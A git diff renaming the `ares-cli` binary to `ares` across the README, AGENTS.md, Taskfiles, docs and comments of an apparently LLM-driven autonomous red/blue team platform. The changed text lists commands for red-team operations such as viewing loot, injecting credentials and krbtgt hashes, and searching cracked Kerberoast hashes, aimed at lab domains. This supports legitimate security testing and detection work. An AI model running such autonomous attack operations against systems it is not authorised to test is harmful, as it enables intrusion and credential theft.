evidence --latest --json +ares --k8s ares-blue blue triage-status --latest +ares --k8s ares-blue blue operation-status --latest --watch 5 # Reports -ares-cli --k8s ares-blue blue report --latest # Multi-investigation summary -ares-cli --k8s ares-blue blue report --investigation-id inv-xxx # Single report +ares --k8s ares-blue blue report --latest # Multi-investigation summary +ares --k8s ares-blue blue report --investigation-id inv-xxx # Single report ``` ## Historical Data (Requires Postgres) @@ -172,11 +172,11 @@ ares-cli --k8s ares-blue blue report --investigation-id inv-xxx # Single report Use these to query results across all previous operations. ```bash -ares-cli history list --domain contoso.local --has-da true -ares-cli history search-creds --username admin --admin -ares-cli history search-hashes --hash-type kerberoast --cracked -ares-cli history mitre-coverage --since-days 30 -ares-cli history cost --since-days 7 +ares history list --domain contoso.local --has-da true +ares history search-creds --username admin --admin +ares history search-hashes --hash-type kerberoast --cracked +ares history mitre-coverage --since-days 30 +ares history cost --since-days 7 ``` ## Configuration Management @@ -184,10 +184,10 @@ ares-cli history cost --since-days 7 Config file: `./config/ares.yaml` is the single source of truth. 
```bash -ares-cli config show --models # show model assignments -ares-cli config set-model orchestrator gpt-5.2 # set per-role model -ares-cli config set-model --all gpt-5.2 # set all roles -ares-cli config validate # check config file +ares config show --models # show model assignments +ares config set-model orchestrator gpt-5.2 # set per-role model +ares config set-model --all gpt-5.2 # set all roles +ares config validate # check config file # Taskfile wrappers task config:models @@ -208,10 +208,10 @@ task remote:logs ROLE=orchestrator # Read logs ### Debugging Stuck Operations 1. **Check Grafana** (`grafana.dev.plundr.ai`) for token usage and Loki errors. -2. **Check failed tasks**: `ares-cli --k8s ares-red ops tasks --latest --status failed`. +2. **Check failed tasks**: `ares --k8s ares-red ops tasks --latest --status failed`. 3. **Verify binary sync**: `task remote:check`. 4. **Inject state**: If the LLM is stuck on a specific discovery step, manually inject the result. -5. **Restart**: `ares-cli --k8s ares-red ops kill --all` then re-submit. +5. **Restart**: `ares --k8s ares-red ops kill --all` then re-submit. ## GOAD Lab Reference @@ -221,6 +221,6 @@ task remote:logs ROLE=orchestrator # Read logs ## Important Notes -- **CLI vs Taskfile**: Use `ares-cli` with `--k8s` for querying status and loot. Use `task` for deployment, launching new operations, and complex multi-step workflows. +- **CLI vs Taskfile**: Use `ares` with `--k8s` for querying status and loot. Use `task` for deployment, launching new operations, and complex multi-step workflows. - **1Password**: If `--secrets-from 1password` is used, ensure you are logged in (`op signin`). -- **Binary Sync**: The system is sensitive to version mismatches between local `ares-cli` and remote `ares-orchestrator`. Always `task remote:rust:deploy:quick` after code changes. +- **Binary Sync**: The system is sensitive to version mismatches between local `ares` and remote `ares-orchestrator`. Always `task remote:rust:deploy:quick` after code changes. 
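For context on the consolidation these patches implement: a single binary that dispatches CLI, orchestrator, and worker roles can be outlined in a few lines. This is an illustrative sketch only, assuming clap 4 with the derive feature; the type and function names are hypothetical, not the actual ares code.

```rust
use clap::{Parser, Subcommand};

#[derive(Parser)]
#[command(name = "ares")]
struct Cli {
    #[command(subcommand)]
    role: Role,
}

#[derive(Subcommand)]
enum Role {
    /// LLM coordination loop (replaces the old ares-orchestrator binary).
    Orchestrator,
    /// Task execution agent (replaces the old ares-worker binary).
    Worker,
    /// Operator-facing commands (ops, blue, history, config, ...).
    Ops,
}

fn main() {
    // Service roles initialize their own telemetry with the correct service
    // name, which is why PATCH 02 skips the global init for them.
    match Cli::parse().role {
        Role::Orchestrator => run_orchestrator(),
        Role::Worker => run_worker(),
        Role::Ops => run_ops(),
    }
}

fn run_orchestrator() { /* coordination loop */ }
fn run_worker() { /* task polling loop */ }
fn run_ops() { /* CLI command handling */ }
```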
diff --git a/.github/CONTRIBUTING.md b/.github/CONTRIBUTING.md index 5c6398e8..7808ccc6 100644 --- a/.github/CONTRIBUTING.md +++ b/.github/CONTRIBUTING.md @@ -32,13 +32,11 @@ cargo test --workspace ### Project Structure -Ares is a Cargo workspace with six crates: +Ares is a Cargo workspace that compiles to a single `ares` binary: | Crate | Type | Purpose | |-------|------|---------| -| `ares-cli` | Binary | Unified CLI for ops, blue, history, config | -| `ares-orchestrator` | Binary | LLM-powered coordination loop | -| `ares-worker` | Binary | Task execution agents | +| `ares-cli` | Binary | Unified binary — CLI, orchestrator, and worker | | `ares-core` | Library | Shared models, state, Redis schema, telemetry | | `ares-llm` | Library | Model-agnostic LLM provider abstraction | | `ares-tools` | Library | Tool dispatch and execution framework | diff --git a/.taskfiles/blue/Taskfile.yaml b/.taskfiles/blue/Taskfile.yaml index 9c65fb01..40b616aa 100644 --- a/.taskfiles/blue/Taskfile.yaml +++ b/.taskfiles/blue/Taskfile.yaml @@ -114,7 +114,7 @@ tasks: ANTHROPIC_API_KEY="{{.ANTHROPIC_API_KEY}}" \ GRAFANA_SERVICE_ACCOUNT_TOKEN="{{.GRAFANA_SERVICE_ACCOUNT_TOKEN}}" \ GRAFANA_URL="{{.GRAFANA_URL}}" \ - ares-cli blue from-operation $OP_ARGS \ + ares blue from-operation $OP_ARGS \ $MODEL_FLAG \ --max-steps {{.MAX_STEPS_BLUE_ONCE}} \ --grafana-url "{{.GRAFANA_URL}}" @@ -308,7 +308,7 @@ tasks: ANTHROPIC_API_KEY="{{.ANTHROPIC_API_KEY}}" \ GRAFANA_SERVICE_ACCOUNT_TOKEN="{{.GRAFANA_SERVICE_ACCOUNT_TOKEN}}" \ GRAFANA_URL="{{.GRAFANA_URL}}" \ - ares-cli blue submit "$(cat {{.ALERT}})" \ + ares blue submit "$(cat {{.ALERT}})" \ $INV_ID_ARG \ $MODEL_FLAG \ --max-steps {{.MAX_STEPS_BLUE}} \ @@ -348,7 +348,7 @@ tasks: ANTHROPIC_API_KEY="{{.ANTHROPIC_API_KEY}}" \ GRAFANA_SERVICE_ACCOUNT_TOKEN="{{.GRAFANA_SERVICE_ACCOUNT_TOKEN}}" \ GRAFANA_URL="{{.GRAFANA_URL}}" \ - ares-cli blue from-operation $OP_ARGS \ + ares blue from-operation $OP_ARGS \ $MODEL_FLAG \ --max-steps {{.MAX_STEPS_BLUE}} \ --grafana-url "{{.GRAFANA_URL}}" diff --git a/.taskfiles/red/Taskfile.yaml b/.taskfiles/red/Taskfile.yaml index 5725c694..d8b07465 100644 --- a/.taskfiles/red/Taskfile.yaml +++ b/.taskfiles/red/Taskfile.yaml @@ -81,7 +81,7 @@ tasks: ARES_CONFIG="/etc/ares/config.yaml" \ ARES_MULTI_FOREST_MODE=false \ GRAFANA_URL="{{.GRAFANA_URL}}" \ - ares-cli --redis-url "{{.REDIS_URL}}" ops submit \ + ares --redis-url "{{.REDIS_URL}}" ops submit \ "{{.TARGET}}" "{{.DOMAIN}}" \ --resolve-targets \ --aws-profile "{{.TARGET_PROFILE}}" \ @@ -181,7 +181,7 @@ tasks: ignore_error: true # =========================================================================== - # K8s CLI wrappers — run ares-cli on the orchestrator pod + # K8s CLI wrappers — run ares on the orchestrator pod # =========================================================================== multi:loot: @@ -929,7 +929,7 @@ tasks: # 2. Clear Redis (no longer rescales orchestrator) - cmd: echo "=== CLEARING REDIS CACHE ===" - task: multi:redis:clear - # 3. Patch orchestrator wrapper to use ares-cli instead of redis-cli + # 3. Patch orchestrator wrapper to use ares instead of redis-cli - cmd: echo "=== PATCHING ORCHESTRATOR WRAPPER ===" - task: :remote:orchestrator:patch-wrapper # 4. 
Rollout pods (fresh containers) diff --git a/.taskfiles/remote/Taskfile.yaml b/.taskfiles/remote/Taskfile.yaml index dce4f16f..8d0f8bb7 100644 --- a/.taskfiles/remote/Taskfile.yaml +++ b/.taskfiles/remote/Taskfile.yaml @@ -905,7 +905,7 @@ tasks: EOF orchestrator:patch-wrapper: - desc: "Patch the red orchestrator deployment wrapper to use ares-cli instead of redis-cli" + desc: "Patch the red orchestrator deployment wrapper to use ares instead of redis-cli" silent: true cmds: - | diff --git a/AGENTS.md b/AGENTS.md index 88f80746..705f7caf 100644 --- a/AGENTS.md +++ b/AGENTS.md @@ -7,8 +7,8 @@ Use this workflow when the task is to operate the distributed Ares red/blue team ```text Local (this machine) Remote (K8s or EC2) ──────────────────── ─────────────────── -ares-cli --k8s / --ec2 → ares-orchestrator (LLM coordination loop) - or `task` commands ares-worker x7 (recon, credential_access, +ares --k8s / --ec2 → ares orchestrator (LLM coordination loop) + or `task` commands ares worker x7 (recon, credential_access, cracker, acl, privesc, lateral, coercion) Redis (state store + message broker) ``` @@ -17,9 +17,9 @@ The orchestrator and workers are autonomous LLM agents. You do not control them ## Deployment Targets -**K8s**: Use `ares-cli --k8s ` or `task red:multi:*`. Auto-detects deployment name (`ares-orchestrator` for red, `ares-blue-orchestrator` for blue). +**K8s**: Use `ares --k8s ` or `task red:multi:*`. Auto-detects deployment name (`ares-orchestrator` for red, `ares-blue-orchestrator` for blue). -**EC2**: Use `ares-cli --ec2 ` or `task ec2:*`. Resolves the instance by Name tag and executes via AWS SSM. +**EC2**: Use `ares --ec2 ` or `task ec2:*`. Resolves the instance by Name tag and executes via AWS SSM. ## Global CLI Flags @@ -67,7 +67,7 @@ After code changes, always deploy before testing remote behavior. Use `task remo task red:multi TARGET=dreadgoad DOMAIN=sevenkingdoms.local # Direct CLI -ares-cli ops submit dreadgoad contoso.local \ +ares ops submit dreadgoad contoso.local \ --username administrator --password P@ssw0rd \ --model gpt-5.2 --max-steps 200 --follow @@ -78,11 +78,11 @@ task ec2:launch DOMAIN=sevenkingdoms.local TARGETS=192.168.58.10 ### Monitor ```bash -ares-cli --k8s ares-red ops status --latest -ares-cli --k8s ares-red ops loot --latest --watch 10 --diff -ares-cli --k8s ares-red ops tasks --latest --status failed -ares-cli --k8s ares-red ops queue -ares-cli --k8s ares-red ops list +ares --k8s ares-red ops status --latest +ares --k8s ares-red ops loot --latest --watch 10 --diff +ares --k8s ares-red ops tasks --latest --status failed +ares --k8s ares-red ops queue +ares --k8s ares-red ops list task red:multi:status LATEST=true task red:multi:loot LATEST=true WATCH=10 @@ -94,24 +94,24 @@ task red:multi:tasks:list LATEST=true STATUS=failed Use injection to unblock stalled operations. ```bash -ares-cli --k8s ares-red ops inject-credential op-xxx administrator P@ssw0rd --domain contoso.local -ares-cli --k8s ares-red ops inject-hash op-xxx krbtgt "hash..." --domain contoso.local --aes-key "..." -ares-cli --k8s ares-red ops inject-host op-xxx 192.168.58.20 dc01.fabrikam.local -ares-cli --k8s ares-red ops inject-domain-sid op-xxx --domain fabrikam.local --sid "S-1-5-..." -ares-cli --k8s ares-red ops inject-vulnerability op-xxx constrained_delegation 192.168.58.20 \ +ares --k8s ares-red ops inject-credential op-xxx administrator P@ssw0rd --domain contoso.local +ares --k8s ares-red ops inject-hash op-xxx krbtgt "hash..." --domain contoso.local --aes-key "..." 
+ares --k8s ares-red ops inject-host op-xxx 192.168.58.20 dc01.fabrikam.local +ares --k8s ares-red ops inject-domain-sid op-xxx --domain fabrikam.local --sid "S-1-5-..." +ares --k8s ares-red ops inject-vulnerability op-xxx constrained_delegation 192.168.58.20 \ --account-name svc_sql --domain fabrikam.local ``` ### Reports and maintenance ```bash -ares-cli --k8s ares-red ops report --latest --regenerate -ares-cli --k8s ares-red ops export-detection --latest -ares-cli --k8s ares-red ops offload-cost --latest +ares --k8s ares-red ops report --latest --regenerate +ares --k8s ares-red ops export-detection --latest +ares --k8s ares-red ops offload-cost --latest -ares-cli --k8s ares-red ops backfill-domains op-xxx -ares-cli --k8s ares-red ops kill --all -ares-cli --k8s ares-red ops cleanup --max-age-hours 24 +ares --k8s ares-red ops backfill-domains op-xxx +ares --k8s ares-red ops kill --all +ares --k8s ares-red ops cleanup --max-age-hours 24 ``` ## Blue Team Operations @@ -119,20 +119,20 @@ ares-cli --k8s ares-red ops cleanup --max-age-hours 24 ### Submit investigations ```bash -ares-cli --k8s ares-blue blue from-operation --latest -ares-cli --k8s ares-blue blue submit '{"alert_title":"LSASS Read"}' --model gpt-5.2 -ares-cli --k8s ares-blue blue watch --poll-interval 30 +ares --k8s ares-blue blue from-operation --latest +ares --k8s ares-blue blue submit '{"alert_title":"LSASS Read"}' --model gpt-5.2 +ares --k8s ares-blue blue watch --poll-interval 30 ``` ### Monitor and report ```bash -ares-cli --k8s ares-blue blue status --latest -ares-cli --k8s ares-blue blue evidence --latest --json -ares-cli --k8s ares-blue blue triage-status --latest -ares-cli --k8s ares-blue blue operation-status --latest --watch 5 -ares-cli --k8s ares-blue blue report --latest -ares-cli --k8s ares-blue blue report --investigation-id inv-xxx +ares --k8s ares-blue blue status --latest +ares --k8s ares-blue blue evidence --latest --json +ares --k8s ares-blue blue triage-status --latest +ares --k8s ares-blue blue operation-status --latest --watch 5 +ares --k8s ares-blue blue report --latest +ares --k8s ares-blue blue report --investigation-id inv-xxx ``` ## Historical Data @@ -140,11 +140,11 @@ ares-cli --k8s ares-blue blue report --investigation-id inv-xxx These commands require Postgres. ```bash -ares-cli history list --domain contoso.local --has-da true -ares-cli history search-creds --username admin --admin -ares-cli history search-hashes --hash-type kerberoast --cracked -ares-cli history mitre-coverage --since-days 30 -ares-cli history cost --since-days 7 +ares history list --domain contoso.local --has-da true +ares history search-creds --username admin --admin +ares history search-hashes --hash-type kerberoast --cracked +ares history mitre-coverage --since-days 30 +ares history cost --since-days 7 ``` ## Configuration @@ -152,10 +152,10 @@ ares-cli history cost --since-days 7 The source of truth is `./config/ares.yaml`. ```bash -ares-cli config show --models -ares-cli config set-model orchestrator gpt-5.2 -ares-cli config set-model --all gpt-5.2 -ares-cli config validate +ares config show --models +ares config set-model orchestrator gpt-5.2 +ares config set-model --all gpt-5.2 +ares config validate task config:models task config:set-model -- orchestrator gpt-5.2 @@ -173,10 +173,10 @@ task remote:logs ROLE=orchestrator When an operation is stuck: 1. Check Grafana (`grafana.dev.plundr.ai`) for token use and Loki errors. -2. Check failed tasks with `ares-cli --k8s ares-red ops tasks --latest --status failed`. +2. 
Check failed tasks with `ares --k8s ares-red ops tasks --latest --status failed`. 3. Verify binary sync with `task remote:check`. 4. Inject known state if the model is blocked on a discovery step. -5. Restart with `ares-cli --k8s ares-red ops kill --all`, then resubmit. +5. Restart with `ares --k8s ares-red ops kill --all`, then resubmit. ## GOAD Lab Reference @@ -186,7 +186,7 @@ When an operation is stuck: ## Operating Rules -- Prefer `ares-cli --k8s` for status, loot, reports, and direct operational queries. +- Prefer `ares --k8s` for status, loot, reports, and direct operational queries. - Prefer `task` for deployments, launches, and multi-step workflows. - If using `--secrets-from 1password`, ensure `op signin` is already valid. - The system is sensitive to local/remote binary mismatches. After code changes, run `task remote:rust:deploy:quick` and then `task remote:check`. diff --git a/README.md b/README.md index 383da426..0673ceb1 100644 --- a/README.md +++ b/README.md @@ -29,24 +29,24 @@ LLM-coordinated autonomous security operations platform with two modes: ## Architecture -Ares is a Rust workspace with six crates: +Ares is a Rust workspace that compiles to a single `ares` binary with +subcommands (`ares ops`, `ares orchestrator`, `ares worker`, `ares blue`, +`ares history`, `ares config`): -| Crate | Binary | Purpose | -| ------------------- | ------------------- | --------------------------------------------------------- | -| `ares-cli` | `ares-cli` | Unified CLI - ops, blue, history, config management | -| `ares-orchestrator` | `ares-orchestrator` | LLM-powered coordination loop, task dispatch, strategy | -| `ares-worker` | `ares-worker` | Task execution agents (one per role, K8s or EC2) | -| `ares-core` | - | Shared models, state management, Redis schema, telemetry | -| `ares-llm` | - | LLM providers (Anthropic, OpenAI, Ollama) + tool registry | -| `ares-tools` | - | Tool dispatch and execution framework | +| Crate | Purpose | +| ------------ | --------------------------------------------------------- | +| `ares-cli` | Unified binary — CLI, orchestrator, and worker | +| `ares-core` | Shared models, state management, Redis schema, telemetry | +| `ares-llm` | LLM providers (Anthropic, OpenAI, Ollama) + tool registry | +| `ares-tools` | Tool dispatch and execution framework | ### Red Team Multi-Agent System ``` Local (this machine) Remote (K8s or EC2) ──────────────────── ─────────────────── -ares-cli --k8s / --ec2 → ares-orchestrator (LLM coordination loop) - or `task` commands ares-worker x7 (recon, credential_access, +ares --k8s / --ec2 → ares orchestrator (LLM coordination loop) + or `task` commands ares worker x7 (recon, credential_access, cracker, acl, privesc, lateral, coercion) Redis (state store + message broker) ``` @@ -70,8 +70,8 @@ results back. The orchestrator never executes exploitation tools directly. 
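The dispatch model referenced in this hunk (the orchestrator enqueues tasks, workers execute them and report results back through Redis) can be pictured with two functions. The queue name and the use of a recent `redis` crate (0.25+, where BRPOP takes a float timeout) are assumptions for illustration, not the real ares schema.

```rust
use redis::Commands;

/// Orchestrator side: enqueue a serialized task onto a role-specific queue.
fn dispatch_task(
    conn: &mut redis::Connection,
    role: &str,
    task_json: &str,
) -> redis::RedisResult<()> {
    // Hypothetical queue name; the real key layout lives in ares-core.
    conn.lpush(format!("ares:queue:{role}"), task_json)
}

/// Worker side: block until a task arrives. BRPOP returns (key, value);
/// a timeout of 0.0 means wait indefinitely.
fn next_task(
    conn: &mut redis::Connection,
    role: &str,
) -> redis::RedisResult<(String, String)> {
    conn.brpop(format!("ares:queue:{role}"), 0.0)
}
```

With a blocking pop, idle workers consume no CPU and each task is handed to exactly one worker on its role queue.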
``` Local (this machine) Remote (K8s or EC2) ──────────────────── ─────────────────── -ares-cli --k8s / --ec2 → ares-orchestrator (investigation coordination) - or `task` commands ares-worker x4 (triage, threat_hunter, +ares --k8s / --ec2 → ares orchestrator (investigation coordination) + or `task` commands ares worker x4 (triage, threat_hunter, lateral_analyst, escalation_triage) Redis (state store + message broker) Grafana (Loki logs + Prometheus metrics) @@ -109,7 +109,7 @@ task rust:build # debug build task rust:release # release build (recommended) # Verify -./target/release/ares-cli --help +./target/release/ares --help ``` **Configure:** @@ -128,22 +128,22 @@ task ares:config:check ## CLI Reference -The `ares-cli` binary is the unified interface for all operations. It supports +The `ares` binary is the unified interface for all operations. It supports transparent remote execution via transport flags. ### Transport Flags ```bash # K8s: execute on orchestrator pod via kubectl -ares-cli --k8s ares-red ops loot --latest -ares-cli --k8s ares-blue blue status --latest +ares --k8s ares-red ops loot --latest +ares --k8s ares-blue blue status --latest # EC2: execute on instance via AWS SSM -ares-cli --ec2 kali-ares ops loot --latest +ares --ec2 kali-ares ops loot --latest # Override defaults -ares-cli --k8s ares-red --k8s-deploy ares-orchestrator ops list -ares-cli --ec2 kali-ares --ec2-profile prod --ec2-region us-east-1 ops list +ares --k8s ares-red --k8s-deploy ares-orchestrator ops list +ares --ec2 kali-ares --ec2-profile prod --ec2-region us-east-1 ops list ``` | Flag | Default | Description | @@ -226,7 +226,7 @@ ares-cli --ec2 kali-ares --ec2-profile prod --ec2-region us-east-1 ops list task red:multi TARGET=dreadgoad DOMAIN=sevenkingdoms.local # Via CLI directly -ares-cli ops submit dreadgoad sevenkingdoms.local \ +ares ops submit dreadgoad sevenkingdoms.local \ --ips 192.168.58.10,192.168.58.11 \ --model gpt-5.2 --follow @@ -237,35 +237,35 @@ task ec2:launch DOMAIN=sevenkingdoms.local TARGETS=192.168.58.10,192.168.58.11 ### Monitor ```bash -ares-cli --k8s ares-red ops status --latest -ares-cli --k8s ares-red ops loot --latest --watch 10 -ares-cli --k8s ares-red ops tasks --latest --status failed -ares-cli --k8s ares-red ops runtime --latest +ares --k8s ares-red ops status --latest +ares --k8s ares-red ops loot --latest --watch 10 +ares --k8s ares-red ops tasks --latest --status failed +ares --k8s ares-red ops runtime --latest task remote:logs ROLE=orchestrator ``` ### Inject State (Unblock Stuck Operations) ```bash -ares-cli --k8s ares-red ops inject-credential op-xxx administrator P@ssw0rd \ +ares --k8s ares-red ops inject-credential op-xxx administrator P@ssw0rd \ --domain contoso.local -ares-cli --k8s ares-red ops inject-hash op-xxx krbtgt \ +ares --k8s ares-red ops inject-hash op-xxx krbtgt \ "aad3b435b51404eeaad3b435b51404ee:313b6f423a..." \ --domain sevenkingdoms.local --aes-key "f8b6c5e4d3a2b109..." -ares-cli --k8s ares-red ops inject-host op-xxx 192.168.58.20 dc01.essos.local +ares --k8s ares-red ops inject-host op-xxx 192.168.58.20 dc01.essos.local -ares-cli --k8s ares-red ops inject-domain-sid op-xxx \ +ares --k8s ares-red ops inject-domain-sid op-xxx \ --domain north.sevenkingdoms.local --sid "S-1-5-21-..." 
``` ### Reports ```bash -ares-cli --k8s ares-red ops report --latest -ares-cli --k8s ares-red ops report --latest --regenerate -ares-cli --k8s ares-red ops export-detection --latest +ares --k8s ares-red ops report --latest +ares --k8s ares-red ops report --latest --regenerate +ares --k8s ares-red ops export-detection --latest ``` ### Operation Phases @@ -344,12 +344,10 @@ See [Blue Team Documentation](docs/blue.md) for full command reference. ### Repository Layout ```text -ares-cli/ # CLI binary crate +ares-cli/ # Unified binary (CLI + orchestrator + worker) ares-core/ # Shared library (models, state, telemetry) ares-llm/ # LLM provider abstraction -ares-orchestrator/ # Orchestrator binary crate ares-tools/ # Tool dispatch framework -ares-worker/ # Worker binary crate config/ # Configuration files ares.yaml # Master config (models, timeouts, capabilities) @@ -446,10 +444,10 @@ The master config lives at `config/ares.yaml`. It defines: - Recovery and context management settings ```bash -ares-cli config show --models # show model assignments -ares-cli config set-model orchestrator gpt-5.2 -ares-cli config set-model --all gpt-5.2 -ares-cli config validate +ares config show --models # show model assignments +ares config set-model orchestrator gpt-5.2 +ares config set-model --all gpt-5.2 +ares config validate ``` ### Environment Variables diff --git a/Taskfile.yaml b/Taskfile.yaml index 53e402ed..863becbc 100644 --- a/Taskfile.yaml +++ b/Taskfile.yaml @@ -185,14 +185,14 @@ tasks: silent: true cmds: - cargo build - - echo "Debug binary built at target/debug/ares-cli" + - echo "Debug binary built at target/debug/ares" rust:release: desc: Build the Rust CLI binary (release) silent: true cmds: - cargo build --release - - echo "Release binary built at target/release/ares-cli" + - echo "Release binary built at target/release/ares" rust:test: desc: Run Rust tests diff --git a/ares-cli/src/blue/submit.rs b/ares-cli/src/blue/submit.rs index ef40ee1f..ececdb21 100644 --- a/ares-cli/src/blue/submit.rs +++ b/ares-cli/src/blue/submit.rs @@ -242,7 +242,7 @@ pub(crate) async fn blue_from_operation( info!("Investigation submitted: {inv_id}"); println!("Investigation submitted: {inv_id} (from operation {op_id})"); println!("Status: submitted"); - println!("\nTrack progress with: ares-cli blue operation-status {op_id}"); + println!("\nTrack progress with: ares blue operation-status {op_id}"); Ok(()) } diff --git a/ares-cli/src/ops/backfill.rs b/ares-cli/src/ops/backfill.rs index d57f39ff..23fc8876 100644 --- a/ares-cli/src/ops/backfill.rs +++ b/ares-cli/src/ops/backfill.rs @@ -163,7 +163,7 @@ pub(crate) async fn ops_offload_cost( if rows_affected == 0 { println!( "Warning: Operation {op_id} not found in PostgreSQL. \ - Run 'ares-cli ops offload' to persist the operation first." + Run 'ares ops offload' to persist the operation first." 
); return Ok(()); } diff --git a/ares-cli/src/orchestrator/blue/auto_submit.rs b/ares-cli/src/orchestrator/blue/auto_submit.rs index cf64061d..38ccfd73 100644 --- a/ares-cli/src/orchestrator/blue/auto_submit.rs +++ b/ares-cli/src/orchestrator/blue/auto_submit.rs @@ -169,7 +169,7 @@ async fn submit_investigation( let grafana_url = std::env::var("GRAFANA_URL").ok(); let grafana_token = std::env::var("GRAFANA_SERVICE_ACCOUNT_TOKEN").ok(); - // Build synthetic alert (mirrors ares-cli blue from-operation) + // Build synthetic alert (mirrors `ares blue from-operation`) let operation_context = serde_json::json!({ "operation_id": op_id, "attack_window_start": now.to_rfc3339(), diff --git a/ares-cli/src/orchestrator/blue/investigation.rs b/ares-cli/src/orchestrator/blue/investigation.rs index a0b566a1..d9583757 100644 --- a/ares-cli/src/orchestrator/blue/investigation.rs +++ b/ares-cli/src/orchestrator/blue/investigation.rs @@ -72,7 +72,7 @@ pub async fn run_investigation( ); // Load investigation env vars from Redis and inject into process environment. - // These are set by `ares-cli blue from-operation` and include GRAFANA_URL, + // These are set by `ares blue from-operation` and include GRAFANA_URL, // GRAFANA_SERVICE_ACCOUNT_TOKEN, etc. needed by blue tools (e.g. Loki queries // routed through Grafana's datasource proxy). let env_key = format!("ares:blue:inv:{}:env_vars", investigation.investigation_id); diff --git a/ares-cli/src/orchestrator/mod.rs b/ares-cli/src/orchestrator/mod.rs index 0d9aa4da..1d79481f 100644 --- a/ares-cli/src/orchestrator/mod.rs +++ b/ares-cli/src/orchestrator/mod.rs @@ -595,7 +595,7 @@ async fn run_inner() -> Result<()> { } } - // Poll for remote stop signal from `ares-cli ops stop` + // Poll for remote stop signal from `ares ops stop` _ = stop_check.tick() => { let mut conn = queue.connection(); match ares_core::state::is_stop_requested(&mut conn, &config.operation_id).await { diff --git a/ares-core/src/lib.rs b/ares-core/src/lib.rs index 6d5ef15f..989cf7f3 100644 --- a/ares-core/src/lib.rs +++ b/ares-core/src/lib.rs @@ -1,7 +1,7 @@ //! Core library for the Ares red team orchestration system. //! //! This crate provides the data models and Redis state backend used by the -//! `ares-cli` binary to interact with the Ares orchestrator system. +//! `ares` binary to interact with the Ares orchestrator system. //! //! # Modules //! diff --git a/docs/blue.md b/docs/blue.md index 8a7cae2f..7bc53733 100644 --- a/docs/blue.md +++ b/docs/blue.md @@ -25,7 +25,7 @@ findings to MITRE ATT&CK, and writes investigation reports. 
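The env-var handoff described in the `investigation.rs` hunk above is a simple pattern: `ares blue from-operation` writes variables under a per-investigation Redis key, and the orchestrator injects them before blue tools run. A rough sketch of the loading half follows; the key format is taken from the diff, while the rest is illustrative and assumes the `redis` crate.

```rust
use redis::Commands;
use std::collections::HashMap;

/// Load investigation-scoped env vars from Redis and inject them into the
/// process environment so blue tools (e.g. Loki queries routed through
/// Grafana's datasource proxy) can pick them up.
fn inject_env_vars(
    conn: &mut redis::Connection,
    investigation_id: &str,
) -> redis::RedisResult<()> {
    let key = format!("ares:blue:inv:{investigation_id}:env_vars");
    let vars: HashMap<String, String> = conn.hgetall(&key)?;
    for (name, value) in vars {
        // set_var mutates process-global state; call before spawning threads.
        std::env::set_var(name, value);
    }
    Ok(())
}
```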
#### Investigation Orchestrator -**Location:** `ares-orchestrator/src/blue/` +**Location:** `ares-cli/src/orchestrator/blue/` The investigation orchestrator manages the full investigation lifecycle: @@ -38,7 +38,7 @@ The investigation orchestrator manages the full investigation lifecycle: #### Blue Worker Task Loop -**Location:** `ares-worker/src/blue_task_loop.rs` +**Location:** `ares-cli/src/worker/blue_task_loop.rs` Runs the worker-side investigation loop with: @@ -595,8 +595,8 @@ Provides structured investigation workflows: | Component | Path | | ----------- | ------ | -| Blue Orchestrator | `ares-orchestrator/src/blue/` | -| Blue Worker Task Loop | `ares-worker/src/blue_task_loop.rs` | +| Blue Orchestrator | `ares-cli/src/orchestrator/blue/` | +| Blue Worker Task Loop | `ares-cli/src/worker/blue_task_loop.rs` | | Blue CLI Commands | `ares-cli/src/blue/` | | Core Models | `ares-core/src/models/` | | State Management | `ares-core/src/state/` | @@ -638,7 +638,7 @@ blue_team: `GRAFANA_SERVICE_ACCOUNT_TOKEN`, `DREADNODE_API_KEY` - **Grafana MCP** configured (see [Grafana MCP Usage](grafana_mcp_usage.md)) - **Redis** accessible (K8s in-cluster, or port-forwarded for local/EC2) -- **ares-cli** binary built (`cargo build --release`) +- **ares** binary built (`cargo build --release`) ### Quick Start @@ -758,39 +758,39 @@ task blue:multi:cleanup ALL=true DRY_RUN=true # preview before deleting ### Direct CLI Commands For environments without Taskfile, or when you need more control, use -`ares-cli` directly. Add `--k8s ` for K8s or `--ec2 ` for +`ares` directly. Add `--k8s ` for K8s or `--ec2 ` for EC2 transport. ```bash # Submit from red team operation alerts -ares-cli blue from-operation --latest -ares-cli --k8s attack-simulation blue from-operation op-xxx +ares blue from-operation --latest +ares --k8s attack-simulation blue from-operation op-xxx # Submit a single alert -ares-cli blue submit '{"alert_title":"Suspicious LSASS","severity":"high"}' +ares blue submit '{"alert_title":"Suspicious LSASS","severity":"high"}' # Continuous poll mode -ares-cli blue watch --poll-interval 30 --max-steps 50 +ares blue watch --poll-interval 30 --max-steps 50 # Investigation status and results -ares-cli blue list -ares-cli blue status --latest -ares-cli blue evidence --latest -ares-cli blue evidence --latest --json -ares-cli blue techniques --latest -ares-cli blue runtime --latest -ares-cli blue triage-status --latest -ares-cli blue operation-status --latest --watch 10 +ares blue list +ares blue status --latest +ares blue evidence --latest +ares blue evidence --latest --json +ares blue techniques --latest +ares blue runtime --latest +ares blue triage-status --latest +ares blue operation-status --latest --watch 10 # Report generation -ares-cli blue report --latest --output-dir ./reports -ares-cli blue report --operation-id op-xxx --regenerate +ares blue report --latest --output-dir ./reports +ares blue report --operation-id op-xxx --regenerate # Cleanup -ares-cli blue delete inv-xxx --force -ares-cli blue delete-operation op-xxx --force -ares-cli blue cleanup --max-age-hours 24 --all --force -ares-cli blue cleanup --dry-run +ares blue delete inv-xxx --force +ares blue delete-operation op-xxx --force +ares blue cleanup --max-age-hours 24 --all --force +ares blue cleanup --dry-run ``` ### EC2 Deployment @@ -802,7 +802,7 @@ When running on EC2 instead of K8s, port-forward Redis first: task ec2:redis:forward EC2_NAME=ares-tools # In another terminal, run blue commands with the forwarded Redis 
